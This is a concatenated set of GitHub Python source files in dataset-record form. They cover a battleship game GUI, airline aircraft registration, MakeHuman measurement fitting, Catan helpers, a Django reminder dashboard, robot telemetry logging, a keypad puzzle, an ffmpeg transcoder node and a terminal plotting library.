1, 3, 1, 1)\n lay.addWidget(ship3g, 2, 0, 1, 1)\n lay.addWidget(ship3c, 2, 2, 1, 1)\n lay.addWidget(self.count_g[2], 2, 1, 1, 1)\n lay.addWidget(self.count_c[2], 2, 3, 1, 1)\n lay.addWidget(ship2g, 3, 0, 1, 1)\n lay.addWidget(ship2c, 3, 2, 1, 1)\n lay.addWidget(self.count_g[1], 3, 1, 1, 1)\n lay.addWidget(self.count_c[1], 3, 3, 1, 1)\n lay.addWidget(ship1g, 4, 0, 1, 1)\n lay.addWidget(ship1c, 4, 2, 1, 1)\n lay.addWidget(self.count_g[0], 4, 1, 1, 1)\n lay.addWidget(self.count_c[0], 4, 3, 1, 1)\n\n self.main_grid_layout.addWidget(self.ships, 13, 1, 4, 1)\n\n def connection(self):\n self.start_game.clicked.connect(self.slots.start_game)\n self.set_ships.clicked.connect(self.slots.begin_game)\n self.scene_comp.click_for_show_coord.connect(self.slots.shoot)\n self.scene_gamer.click_up.connect(self.slots.up)\n self.scene_gamer.click_down.connect(self.slots.down)\n self.scene_gamer.click_left.connect(self.slots.left)\n self.scene_gamer.click_right.connect(self.slots.right)\n self.scene_gamer.click_rotate.connect(self.slots.rotate)\n self.scene_gamer.click_set.connect(self.slots.space)\n","repo_name":"Momami/SeeBattle","sub_path":"Interface/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":9679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8974077608","text":"from c_Logic.A_LL_API import LL_API\n\nclass UI_Aircraft :\n def __init__(self, logicAPI_in ) :\n self.la = logicAPI_in\n\n def register_aircraft_UI(self):\n ''' Registers aircrafts and adds it to CSV '''\n register = True\n while register == True :\n print(\"-=x=\"*15)\n print(\" \"*21 +\"Register airplanes\")\n print(\"-=x=\"*15 + \"\\n\")\n nickname = input(\"Plane nickname: \").upper()\n aircraftID = input(\"Aircraft ID (e.g TF-XXX): \").upper()\n if self.la.check_aircraftid(aircraftID) == False :\n print(\"\\nNot a valid aircraftID!\\n\")\n break\n print(\"\\t(1) - NAFokkerF100\") \n print(\"\\t(2) - NABAE146\")\n print(\"\\t(3) - NAFokkerF28\")\n pick = input(\"Pick a new licence: \") \n if pick == \"1\":\n planeTypeId = 
\"NAFokkerF100\"\n capacity = \"100\"\n manufacturer = \"Fokker\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n elif pick == \"2\":\n planeTypeId = \"NABAE146\"\n capacity = \"82\"\n manufacturer = \"BAE\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n elif pick == \"3\":\n planeTypeId = \"NAFokkerF28\"\n capacity = \"65\"\n manufacturer = \"Fokker\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n input(\"\\nPress ENTER to continue..\")\n print()\n self.la.addnewaircraft(nickname,aircraftID,planeTypeId,capacity,manufacturer)\n break","repo_name":"noifjalar/NANAIR","sub_path":"b_UI/UI_Aircraft.py","file_name":"UI_Aircraft.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15695739250","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n# ZatFits\n# Wed 16 Apr\n\nimport importlib\nfrom ZTmeasuretarget import ZTMeasureTarget\nimport time\n\n\nclass ZThuman:\n '''\n Implementing ZatFits version of human.\n This class will directly use MH version of human class.\n /!\\ THIS IS NOT MADE for app.selectedHuman /!\\\n '''\n\n def __init__(self, h, app, key):\n self.containedHuman = h\n self.app = app\n self.key = key\n self.associate_dict = {'hip': ('hip-scale-vert-decr', 'hip-scale-vert-incr')}\n self.targetlist = []\n\n def __str__(self):\n return 'Human [%s]' % self.key\n\n def __repr__(self):\n return self.__str__()\n\n def save(self, path):\n self.app.saveHuman(path, self.containedHuman)\n\n def associate(self, target):\n return self.associate_dict[target]\n\n def modify(self, modification_list):\n # Instantiate the humanmodifier\n if self.app.humanmodifier is None:\n self.app.humanmodifier = importlib.import_module('humanmodifier')\n\n # Getting modifications from json\n if modification_list:\n for modification in modification_list:\n new_target = ZTMeasureTarget(self.app,\n name=modification['target'],\n value=float(modification['value']))\n self.targetlist.append(new_target)\n self.containedHuman.applyAllTargets()\n\n # Preliminary measurements\n allisMeasured = 0.\n for target in self.targetlist:\n target.measure = self.app.ztruler.getMeasure(self.containedHuman,\n target.name,\n target.units)\n allisMeasured += target.compareMeasureTarget()\n\n # Dicotomy loop\n iteration = 0\n while allisMeasured != 0.:\n dicotomystarttime = time.time()\n for target in self.targetlist:\n if target.isMeasureInferiorToValue():\n target.miniter = target.iterval\n target.setIter()\n target.setModifierIter(target.iterval)\n elif target.isMeasureSuperiorToValue():\n target.maxiter = target.iterval\n target.setIter()\n target.setModifierIter(target.iterval)\n else:\n target.goal = 0.\n self.containedHuman.applyAllTargets(update=True)\n\n dicotomyendtime = time.time()\n iteration = iteration + 1\n t = dicotomyendtime - dicotomystarttime\n print(t)\n # requests measurements\n allisMeasured = 0.\n for target in self.targetlist:\n target.measure = self.app.ztruler.getMeasure(self.containedHuman,\n target.name,\n target.units)\n if abs(target.iterval) > (target.initial_max_iter - 0.001)\\\n or abs(target.iterval) < (target.initial_min_iter + 0.001):\n r = 0.\n else:\n r = target.compareMeasureTarget()\n\n if r == 0:\n allisMeasured += 
r\n","repo_name":"ludoimerir/testzatfits","sub_path":"zatfits/servers/makehuman/apps/ZThuman.py","file_name":"ZThuman.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30482782292","text":"from itertools import chain, combinations\nfrom collections import Counter\n\ndef counter_to_list(data):\n if type(data) == Counter:\n data = list(data.items())\n return [val for val, cnt in data for i in range(cnt)]\n\ndef max_values_dict(data):\n max_value = max(data.values())\n return [k for k,v in data.items() if v == max_value], max_value\n\ndef merge_list(data):\n return list(itertools.chain(*data))\n\ndef get_all_combos(data): # accepts a counter.\n combos = [{}]\n for key in data:\n if data[key] == 0:\n for c in combos:\n c[key] = 0\n else:\n new_combos = []\n for c in combos:\n for i in range(data[key]+1):\n nc = c.copy()\n nc[key] = i\n new_combos.append(nc)\n combos = new_combos\n return combos\n\ndef unique_combinations(data, size):\n data = counter_to_list(data)\n combos = list(combinations(data, size))\n return set(combos)\n\n# a = Counter({\"a\":3, \"b\":4, \"c\":2, \"d\":0})\n# for i in unique_combinations(a, 5):\n# print(i)\n\nplayer_colors = [\"blue\", \"red\", \"green\", \"purple\"]\n","repo_name":"kindalime/catan-agent","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15996365736","text":"from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.db import connection\n\nfrom projects.utils import namedtuplefetchall\n\nfrom django.http import JsonResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom datetime import datetime\n\n# Create your views here.\ndef landing(request):\n return render(request,'home/landing.html')\n\n@login_required\n@csrf_exempt\ndef dashboard(request):\n if request.method ==\"POST\":\n data = request.POST\n try:\n id = data.get('id')\n id= int(json.loads(id))\n with connection.cursor() as curr:\n curr.execute(\"DELETE FROM reminder WHERE `index` = %s\",[id])\n\n return JsonResponse(1,safe=False)\n except:\n data = request.POST\n desc = json.loads(data.get('reminder'))\n\n if desc == '':\n messages.warning(request,message=\"Empty Reminder Cannot be added\")\n return JsonResponse(1,safe=False)\n else:\n prior = json.loads(data.get('priority'))\n if prior == \"High\":\n prior = 1\n else:\n prior = 0\n with connection.cursor() as curr:\n curr.execute(\"INSERT INTO reminder(id,description,priority) VALUES (%s,%s,%s)\",\n [request.user.id, desc, prior])\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\"SELECT * FROM reminder WHERE id = %s\", [request.user.id])\n res = namedtuplefetchall(curr)\n now = datetime.now()\n day = now.strftime(\"%A\")\n month = now.strftime(\"%B\")\n crtime = now.strftime('%H:%M')\n date = now.date().day\n time = {\n 'time': crtime,\n 'day': day,\n 'month': month,\n 'date': date\n }\n return render(request, 'home/dashboard.html', {'result': res, 'time': time})\n","repo_name":"ayush113/CompanyManagement","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41689177031","text":"from 
. import input_configuration\nfrom . import metadata\nfrom . import node_base\n\n# For H264, there are different profiles with different required command line\n# arguments.\nprofile_args = {\n 'baseline': ['-profile:v', 'baseline', '-level:v', '3.0'],\n 'main': ['-profile:v', 'main', '-level:v', '3.1'],\n 'high': ['-profile:v', 'high', '-level:v', '4.0'],\n 'uhd': ['-profile:v', 'high', '-level:v', '5.1'],\n}\n\nclass TranscoderNode(node_base.NodeBase):\n\n def __init__(self, input_paths, output_audios, output_videos, input_config, config):\n super().__init__()\n self._input_paths = input_paths\n self._output_audios = output_audios\n self._output_videos = output_videos\n self._input_config = input_config\n self._config = config\n\n assert len(input_config.inputs) == len(input_paths)\n\n def start(self):\n args = [\n 'ffmpeg',\n # Do not prompt for output files that already exist. Since we created\n # the named pipe in advance, it definitely already exists. A prompt\n # would block ffmpeg to wait for user input.\n '-y',\n ]\n\n if self._config.quiet:\n args += [\n # Suppresses all messages except errors.\n # Without this, a status line will be printed by default showing\n # progress and transcoding speed.\n '-loglevel', 'error',\n ]\n\n if any([output.hardware for output in self._output_videos]):\n args += [\n # Hardware acceleration args.\n '-hwaccel', 'vaapi',\n '-vaapi_device', '/dev/dri/renderD128',\n ]\n\n # TODO(joeyparrish): put input paths into self._input_config.inputs\n for i, input in enumerate(self._input_config.inputs):\n input_path = self._input_paths[i]\n\n if self._config.mode == 'live':\n args += self._live_input(input)\n\n if input.get_start_time():\n args += [\n # Encode from intended starting time of the VOD input.\n '-ss', input.get_start_time(),\n ]\n if input.get_end_time():\n args += [\n # Encode until intended ending time of the VOD input.\n '-to', input.get_end_time(),\n ]\n\n # The input name always comes after the applicable input arguments.\n args += [\n # The input itself.\n '-i', input_path,\n ]\n\n for i, input in enumerate(self._input_config.inputs):\n map_args = [\n # Map corresponding input stream to output file.\n # The format is \":\", so \"i\" here is\n # the input file number, and \"input.get_track()\" is the track number\n # from that input file. The output stream for this input is implied\n # by where we are in the ffmpeg argument list.\n '-map', '{0}:{1}'.format(i, input.get_track()),\n ]\n\n if input.get_media_type() == 'audio':\n for audio in self._output_audios:\n # Map arguments must be repeated for each output file.\n args += map_args\n args += self._encode_audio(audio, input)\n\n if input.get_media_type() == 'video':\n for video in self._output_videos:\n # Map arguments must be repeated for each output file.\n args += map_args\n args += self._encode_video(video, input)\n\n env = {}\n if self._config.debug_logs:\n # Use this environment variable to turn on ffmpeg's logging. 
This is\n # independent of the -loglevel switch above.\n env['FFREPORT'] = 'file=TranscoderNode.log:level=32'\n\n self._process = self._create_process(args, env)\n\n def _live_input(self, input_object):\n args = []\n if input_object.get_input_type() == 'looped_file':\n pass\n elif input_object.get_input_type() == 'raw_images':\n args += [\n # Parse the input as a stream of images fed into a pipe.\n '-f', 'image2pipe',\n # Set the frame rate to the one specified in the input config.\n # Note that this is the input framerate for the image2 dexuxer, which\n # is not what the similar '-r' option is meant for.\n '-framerate', str(input_object.get_frame_rate()),\n ]\n elif input_object.get_input_type() == 'webcam':\n args += [\n # Format the input using the webcam format.\n '-f', 'video4linux2',\n ]\n args += [\n # A larger queue to buffer input from the pipeline (default is 8).\n # This is in packets, but for raw_images, that means frames. A 720p PPM\n # frame is 2.7MB, and a 1080p PPM is 6.2MB. The entire queue, when\n # full, must fit into memory.\n '-thread_queue_size', '200',\n ]\n return args\n\n def _encode_audio(self, audio, input):\n filters = []\n args = [\n # No video encoding for audio.\n '-vn',\n # Set the number of channels to the one specified in the VOD config\n # file.\n '-ac', str(audio.channels),\n ]\n\n if audio.channels == 6:\n filters += [\n # Work around for https://github.com/google/shaka-packager/issues/598,\n # as seen on https://trac.ffmpeg.org/ticket/6974\n 'channelmap=channel_layout=5.1',\n ]\n\n filters.extend(input.get_filters())\n\n if audio.codec == 'aac':\n args += [\n # Format with MPEG-TS for a pipe.\n '-f', 'mpegts',\n # AAC audio codec.\n '-c:a', 'aac',\n # Set bitrate to the one specified in the VOD config file.\n '-b:a', '{0}'.format(audio.channel_data.aac_bitrate),\n ]\n elif audio.codec == 'opus':\n args += [\n # Opus encoding has output format webm.\n '-f', 'webm',\n # Opus audio codec.\n '-c:a', 'libopus',\n # Set bitrate to the one specified in the VOD config file.\n '-b:a', '{0}'.format(audio.channel_data.opus_bitrate),\n # DASH-compatible output format.\n '-dash', '1',\n ]\n\n if len(filters):\n args += [\n # Set audio filters.\n '-af', ','.join(filters),\n ]\n\n args += [\n # The output.\n audio.pipe,\n ]\n return args\n\n # TODO(joeyparrish): \"video\" is a weak variable name\n def _encode_video(self, video, input):\n filters = []\n args = [\n # No audio encoding for video.\n '-an',\n # Full pelME compare function.\n '-cmp', 'chroma',\n ]\n\n # TODO: auto detection of interlacing\n if input.get_interlaced():\n frame_rate = input.get_frame_rate()\n # Sanity check: since interlaced files are made up of two interlaced\n # frames, the frame rate must be even and not too small.\n assert frame_rate % 2 == 0 and frame_rate >= 48\n filters.append('pp=fd')\n args.extend(['-r', str(frame_rate / 2)])\n\n filters.extend(input.get_filters())\n\n if video.hardware:\n filters.append('format=nv12')\n filters.append('hwupload')\n # -2 here means to choose a width to keep the original aspect ratio.\n filters.append('scale_vaapi=-2:{0}'.format(video.resolution_data.height))\n else:\n # -2 here means to choose a width to keep the original aspect ratio.\n filters.append('scale=-2:{0}'.format(video.resolution_data.height))\n\n if video.codec == 'h264':\n args += [\n # MPEG-TS format works well in a pipe.\n '-f', 'mpegts',\n ]\n\n if self._config.mode == 'live':\n args += [\n # Encodes with highest-speed presets for real-time live streaming.\n '-preset', 'ultrafast',\n 
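# (ultrafast trades compression efficiency for encoder speed, which is
# what a real-time live pipeline needs.)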
]\n else:\n args += [\n # Take your time for VOD streams.\n '-preset', 'slow',\n # Apply the loop filter for higher quality output.\n '-flags', '+loop',\n ]\n\n if video.hardware:\n args += [\n # H264 VAAPI video codec.\n '-c:v', 'h264_vaapi',\n ]\n else:\n args += [\n # H264 video codec.\n '-c:v', 'h264',\n ]\n\n args += [\n # Set bitrate to the one specified in the VOD config file.\n '-b:v', '{0}'.format(video.resolution_data.h264_bitrate),\n # Set maximum number of B frames between non-B frames.\n '-bf', '0',\n # The only format supported by QT/Apple.\n '-pix_fmt', 'yuv420p',\n # Require a closed GOP. Some decoders don't support open GOPs.\n '-flags', '+cgop',\n ]\n # Use different ffmpeg options depending on the H264 profile.\n args += profile_args[video.resolution_data.h264_profile]\n\n elif video.codec == 'vp9':\n args += [\n # Format using webm.\n '-f', 'webm',\n ]\n\n if video.hardware:\n args += [\n # VP9 VAAPI video codec.\n '-c:v', 'vp9_vaapi',\n ]\n else:\n args += [\n # VP9 video codec.\n '-c:v', 'vp9',\n ]\n\n args += [\n # Set bitrate to the one specified in the VOD config file.\n '-b:v', '{0}'.format(video.resolution_data.vp9_bitrate),\n # DASH-compatible output format.\n '-dash', '1',\n ]\n\n keyframe_interval = int(self._config.packager['segment_size'] *\n input.get_frame_rate())\n args += [\n # Set minimum and maximum GOP length.\n '-keyint_min', str(keyframe_interval), '-g', str(keyframe_interval),\n # Set video filters.\n '-vf', ','.join(filters),\n # The output.\n video.pipe,\n ]\n return args\n","repo_name":"pptphutho/shaka-streamer","sub_path":"streamer/transcoder_node.py","file_name":"transcoder_node.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"30993169377","text":"from urllib import request\nimport json,csv\nimport datetime,time\nimport socket\n\n#Fetch the real-time position (GET request)\nurl1 = \"http://10.7.5.88:8080/gs-robot/real_time_data/position\"\n\n#Fetch the real-time linear velocity\nurl5 = \"http://10.7.5.88:8080/gs-robot/real_time_data/cmd_vel\"\n\n#Fetch the device status data\nurl8 = \"http://10.7.5.88:8080/gs-robot/data/device_status\"\n\nurls =[url1,url5,url8]\ndatas = []\ni = 0\n\nhead = ['No.','日期','时间','坐标X','坐标Y','角度R','线速度','角速度','运动速度','运动停止与否','急停按下与否','充电状态','电池电量','电池电压','主机名称','IP_information']\n\nprint('......\\n')\n\nwhile(True):\n\n try:\n \n timenow_1,timenow_2 = datetime.datetime.now().strftime('%Y-%m-%d'),datetime.datetime.now().strftime('%H:%M:%S')\n \n for url in urls:\n req = request.Request(url)\n res = request.urlopen(req)\n content = json.loads(res.read().decode(encoding='utf-8'))\n datas.append(content)\n\n ip_information = socket.gethostbyname_ex(socket.gethostname())\n data_row = [\n i+1,timenow_1,timenow_2,\n datas[0][\"gridPosition\"][\"x\"],datas[0][\"gridPosition\"][\"y\"],round(float(datas[0][\"angle\"]),2),\n datas[1][\"data\"][\"linear\"][\"x\"],round(float(datas[1][\"data\"][\"angular\"][\"z\"]),4),\n datas[2][\"data\"][\"speed\"],datas[2][\"data\"][\"detailedBrakerDown\"],datas[2][\"data\"][\"emergency\"],datas[2][\"data\"][\"charger\"],datas[2][\"data\"][\"battery\"],datas[2][\"data\"][\"batteryVoltage\"],\n ip_information[0],'|'.join(ip_information[2])\n ]\n with open('motion_and_charger_information_records.csv','a',newline='') as result_csv:\n write_csv = csv.writer(result_csv,dialect='excel')\n if head !=[]:\n write_csv.writerow(head)\n head = []\n write_csv.writerow(data_row)\n except Exception as e:\n \n with open('program_error.txt','a') as result:\n \n 
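# Log the failure with its timestamp and fall through, so one bad poll
# does not kill the monitoring loop.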
result.write(\"\\n******\"+str(timenow_1)+ ' ' + str(timenow_2) + \"******\" + '\\n' + str(e) +'\\n')\n \n i = i +1\n datas =[]\n time.sleep(2)","repo_name":"Hylan129/Self-Learning","sub_path":"gaussian_navigation/motion_monitoring/long-term motion monitioring.py","file_name":"long-term motion monitioring.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73513636587","text":"def my_solution(numbers, hand):\n answer = ''\n left = {1, 4, 7}\n right = {3, 6, 9}\n present_left, present_right = 0, 0\n for i in numbers:\n print(present_left, present_right, answer)\n if i in left:\n answer += 'L'\n present_left = i\n elif i in right:\n answer += 'R'\n present_right = i\n else:\n if i - present_left < i - present_right - 2:\n answer += 'L'\n present_left = i\n elif i - present_right - 2 < i - present_left:\n answer += 'R'\n present_right = i\n else:\n if hand == \"left\":\n answer += 'L'\n present_left = i\n else:\n answer += 'R'\n present_right = i\n\n print(answer)\n return answer\n\n\ndef findDistance(currentN, nextN):\n keypad = {1: [0, 0], 2: [1, 0], 3: [2, 0],\n 4: [0, 1], 5: [1, 1], 6: [2, 1],\n 7: [0, 2], 8: [1, 2], 9: [2, 2],\n \"*\": [0, 3], 0: [1, 3], \"#\": [2, 3]}\n x1, y1 = keypad[currentN]\n x2, y2 = keypad[nextN]\n return abs(x1 - x2) + abs(y1 - y2)\n\n\ndef solution(numbers, hand):\n answer = ''\n current_l, current_r = '*', '#'\n\n for i in numbers:\n if i in (1, 4, 7):\n answer += 'L'\n current_l = i\n elif i in (3, 6, 9):\n answer += 'R'\n current_r = i\n else:\n if findDistance(current_l, i) < findDistance(current_r, i):\n answer += 'L'\n current_l = i\n elif findDistance(current_r, i) < findDistance(current_l, i):\n answer += 'R'\n current_r = i\n else:\n if hand == 'left':\n answer += 'L'\n current_l = i\n else:\n answer += 'R'\n current_r = i\n\n return answer\n","repo_name":"JUNYEONG-K/algorithm","sub_path":"programmers/키 패드 누르기.py","file_name":"키 패드 누르기.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4445691351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# The MIT License\n\n# Copyright (c) 2017 - 2018 Tammo Ippen, tammo.ippen@posteo.de\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom itertools import cycle\nimport os\nimport re\n\nfrom six.moves import zip\n\nfrom ._canvas import Canvas\nfrom ._colors import color\nfrom ._input_formatter import InputFormatter\nfrom ._util import hist, mk_timedelta, timestamp\n\n# TODO documentation!!!\n# TODO tests\n\n\nclass Figure(object):\n \"\"\"Figure class to compose multiple plots.\n\n Within a Figure you can easily compose many plots, assign labels to plots\n and define the properties of the underlying Canvas. Possible properties that\n can be defined are:\n\n width, height: int Define the number of characters in X / Y direction\n which are used for plotting.\n x_limits: float Define the X limits of the reference coordinate system,\n that will be plotted.\n y_limits: float Define the Y limits of the reference coordinate system,\n that will be plotted.\n color_mode: str Define the used color mode. See `plotille.color()`.\n with_colors: bool Define whether to use colors at all.\n background: multiple Define the background color.\n x_label, y_label: str Define the X / Y axis label.\n \"\"\"\n _COLOR_SEQ = [\n {'names': 'white', 'rgb': (255, 255, 255), 'byte': 0X7},\n {'names': 'red', 'rgb': (255, 0, 0), 'byte': 0x1},\n {'names': 'green', 'rgb': (0, 255, 0), 'byte': 0x2},\n {'names': 'yellow', 'rgb': (255, 255, 0), 'byte': 0x3},\n {'names': 'blue', 'rgb': (0, 0, 255), 'byte': 0x4},\n {'names': 'magenta', 'rgb': (255, 0, 255), 'byte': 0x5},\n {'names': 'cyan', 'rgb': (0, 255, 255), 'byte': 0x6},\n ]\n\n def __init__(self):\n self._color_seq = iter(cycle(Figure._COLOR_SEQ))\n self._width = None\n self._height = None\n self._x_min = None\n self._x_max = None\n self._y_min = None\n self._y_max = None\n self._color_mode = None\n self._with_colors = True\n self._origin = True\n self.linesep = os.linesep\n self.background = None\n self.x_label = 'X'\n self.y_label = 'Y'\n self._plots = []\n self._in_fmt = InputFormatter()\n\n self._y_axis_right_align = False\n\n @property\n def width(self):\n if self._width is not None:\n return self._width\n return 80\n\n @width.setter\n def width(self, value):\n if not (isinstance(value, int) and value > 0):\n raise ValueError('Invalid width: {}'.format(value))\n self._width = value\n\n @property\n def height(self):\n if self._height is not None:\n return self._height\n return 40\n\n @height.setter\n def height(self, value):\n if not (isinstance(value, int) and value > 0):\n raise ValueError('Invalid height: {}'.format(value))\n self._height = value\n\n @property\n def color_mode(self):\n if self._color_mode is not None:\n return self._color_mode\n return 'names'\n\n @color_mode.setter\n def color_mode(self, value):\n if value not in ('names', 'byte', 'rgb'):\n raise ValueError('Only supports: names, byte, rgb!')\n if self._plots != []:\n raise RuntimeError('Change color mode only, when no plots are prepared.')\n self._color_mode = value\n\n @property\n def with_colors(self):\n return self._with_colors\n\n @with_colors.setter\n def with_colors(self, value):\n if not isinstance(value, bool):\n raise ValueError('Only bool allowed: \"{}\"'.format(value))\n self._with_colors = value\n\n @property\n def origin(self):\n return self._origin\n\n @origin.setter\n def 
origin(self, value):\n if not isinstance(value, bool):\n raise ValueError('Invalid origin: {}'.format(value))\n self._origin = value\n\n def register_label_formatter(self, type_, formatter):\n self._in_fmt.register_formatter(type_, formatter)\n\n def register_float_converter(self, type_, converter):\n self._in_fmt.register_converter(type_, converter)\n\n def x_limits(self):\n return self._limits(self._x_min, self._x_max, False)\n\n def set_x_limits(self, min_=None, max_=None):\n self._x_min, self._x_max = self._set_limits(self._x_min, self._x_max, min_, max_)\n\n def y_limits(self):\n return self._limits(self._y_min, self._y_max, True)\n\n def set_y_limits(self, min_=None, max_=None):\n self._y_min, self._y_max = self._set_limits(self._y_min, self._y_max, min_, max_)\n\n def _set_limits(self, init_min, init_max, min_=None, max_=None):\n if min_ is not None and max_ is not None:\n if min_ >= max_:\n raise ValueError('min_ is larger or equal than max_.')\n init_min = min_\n init_max = max_\n elif min_ is not None:\n if init_max is not None and min_ >= init_max:\n raise ValueError('Previous max is smaller or equal to new min_.')\n init_min = min_\n elif max_ is not None:\n if init_min is not None and init_min >= max_:\n raise ValueError('Previous min is larger or equal to new max_.')\n init_max = max_\n else:\n init_min = None\n init_max = None\n\n return init_min, init_max\n\n def _limits(self, low_set, high_set, is_height):\n if low_set is not None and high_set is not None:\n return low_set, high_set\n\n low, high = None, None\n for p in self._plots:\n if is_height:\n _min, _max = _limit(p.height_vals())\n else:\n _min, _max = _limit(p.width_vals())\n if low is None:\n low = _min\n high = _max\n\n low = min(_min, low)\n high = max(_max, high)\n\n return _choose(low, high, low_set, high_set)\n\n def _y_axis(self, ymin, ymax, label='Y'):\n delta = abs(ymax - ymin)\n if isinstance(delta, timedelta):\n y_delta = mk_timedelta(timestamp(delta) / self.height)\n else:\n y_delta = delta / self.height\n\n res = [self._in_fmt.fmt(i * y_delta + ymin, abs(ymax - ymin), chars=10) + ' | '\n for i in range(self.height)]\n if self._y_axis_right_align:\n tmp_res = []\n for y_val in res:\n pattern = r'\\d.\\d+'\n match = re.match(pattern, y_val)\n if match is not None:\n new_y_val = '{val:.1f}'.format(val=float(match[0])).rjust(10, ' ')\n new_y_val = '{} | '.format(new_y_val)\n tmp_res.append(new_y_val)\n else:\n tmp_res.append(y_val)\n res = tmp_res\n\n # add max separately\n res += [self._in_fmt.fmt(self.height * y_delta + ymin, abs(ymax - ymin), chars=10) + ' |']\n\n # modify max by specific format\n if self._y_axis_right_align:\n pattern = r'\\d.\\d+'\n match = re.match(pattern, res[-1])\n if match is not None:\n new_y_val = '{val:.1f}'.format(val=float(match[0])).rjust(10, ' ')\n new_y_val = '{} | '.format(new_y_val)\n res[-1] = new_y_val\n\n ylbl = '[{}]'.format(label)\n ylbl_left = (10 - len(ylbl)) // 2\n ylbl_right = ylbl_left + len(ylbl) % 2\n\n res += [' ' * (ylbl_left) + ylbl + ' ' * (ylbl_right) + ' ^']\n return list(reversed(res))\n\n def _x_axis(self, xmin, xmax, label='X', with_y_axis=False):\n delta = abs(xmax - xmin)\n if isinstance(delta, timedelta):\n x_delta = mk_timedelta(timestamp(delta) / self.width)\n else:\n x_delta = delta / self.width\n starts = ['', '']\n if with_y_axis:\n starts = ['-' * 11 + '|-', ' ' * 11 + '| ']\n res = []\n\n # res += [starts[0] + '|---------' * (self.width // 10) + '|-> [' + label + ']']\n # res += [starts[1] + ' '.join(self._in_fmt.fmt(i * 10 * x_delta + 
xmin, delta, left=True, chars=9)\n # for i in range(self.width // 10 + 1))]\n res += [starts[0] + '|---------' * (self.width // 10) + '|' + '-' * (self.width % 10-2) + '|-> [' + label + ']']\n\n \"\"\" print last value on x-axis \"\"\"\n _x_axis_info = starts[1] + ' '.join(self._in_fmt.fmt(\\\n i * 10 * x_delta + xmin, delta, left=True, chars=9)\n for i in range(self.width // 10 + 1))\n _x_axis_info = '{base}{space}{suffix}'.format(base=_x_axis_info.rstrip(),\\\n space=' '*(self.width%10-len(str(self.width))-1), suffix=self.width-1)\n res += [_x_axis_info]\n return res\n\n def clear(self):\n self._plots = []\n\n def plot(self, X, Y, lc=None, interp='linear', label=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Plot.create(X, Y, lc, interp, label)]\n\n def scatter(self, X, Y, lc=None, label=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Plot.create(X, Y, lc, None, label)]\n\n def histogram(self, X, bins=160, lc=None): # noqa: N803\n if len(X) > 0:\n if lc is None:\n lc = next(self._color_seq)[self.color_mode]\n self._plots += [Histogram.create(X, bins, lc)]\n\n def show(self, legend=False):\n xmin, xmax = self.x_limits()\n ymin, ymax = self.y_limits()\n if all(isinstance(p, Histogram) for p in self._plots):\n ymin = 0\n # create canvas\n canvas = Canvas(self.width, self.height,\n self._in_fmt.convert(xmin), self._in_fmt.convert(ymin),\n self._in_fmt.convert(xmax), self._in_fmt.convert(ymax),\n self.background, self.color_mode)\n\n plot_origin = False\n for p in self._plots:\n p.write(canvas, self.with_colors, self._in_fmt)\n if isinstance(p, Plot):\n plot_origin = True\n\n if self.origin and plot_origin:\n # print X / Y origin axis\n canvas.line(self._in_fmt.convert(xmin), 0, self._in_fmt.convert(xmax), 0)\n canvas.line(0, self._in_fmt.convert(ymin), 0, self._in_fmt.convert(ymax))\n\n res = canvas.plot(linesep=self.linesep)\n\n # add y axis\n yaxis = self._y_axis(ymin, ymax, label=self.y_label)\n res = (\n yaxis[0] + self.linesep + # up arrow\n yaxis[1] + 